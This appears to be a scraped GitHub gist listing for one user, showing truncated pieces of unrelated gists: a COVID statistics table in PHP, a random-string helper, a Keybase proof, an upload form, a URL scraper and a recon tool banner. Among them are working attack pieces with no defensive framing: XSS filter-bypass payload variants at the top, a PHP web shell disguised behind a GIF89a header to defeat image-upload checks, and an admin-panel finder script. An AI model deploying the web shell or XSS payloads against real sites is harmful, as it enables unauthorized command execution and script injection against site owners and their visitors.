<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$api = file_get_contents('https://api.kawalcorona.com/'); | |
?> | |
<table border=1> | |
<tr> | |
<th>Country</th> | |
<th>Confirmed</th> | |
<th>Deaths</th> | |
<th>Recovered</th> | |
<th>Active</th> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function random($length) { | |
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GIF89a; | |
<?php passthru($_POST["cmd"]); __halt_compiler(); ?> |
I hereby claim:
- I am abaykan on github.
- I am abaykan (https://keybase.io/abaykan) on keybase.
- I have a public key whose fingerprint is 4DF4 F9E8 3A36 A66F 5ED7 B39D 926F C2F7 8043 CE7D
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE HTML> | |
<html lang="en-US"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>UPLOADER</title> | |
</head> | |
<body> | |
<form action="" method="POST" enctype="multipart/form-data"> | |
<input type="text"name="text"/> | |
<input name="file" type="file" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
# Codelatte Team | |
# https://codelatte.org/ | |
# Usage: python3 scrapurl.py https://yoursite.com/ | |
import sys | |
import requests | |
from urllib.request import urlparse, urljoin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
""" | |
Usage | |
-------------- | |
./adfin | |
Enter Site Name (ex: abaykan.com) | |
""" | |
import urllib2,os,sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
~/tools/53R3N17Y (master*) ▶ serenity -a google.com | |
_-----_ | |
| | .------------------------. | |
|--(o)--| | Welcome to 53R3N17Y | | |
`---------´ | abaykan.com | | |
( _´U`_ ) '------------------------' | |
/___A___ | |
| ~ | | |
__'.___.'__ | |
´ ` |° ´ Y ` |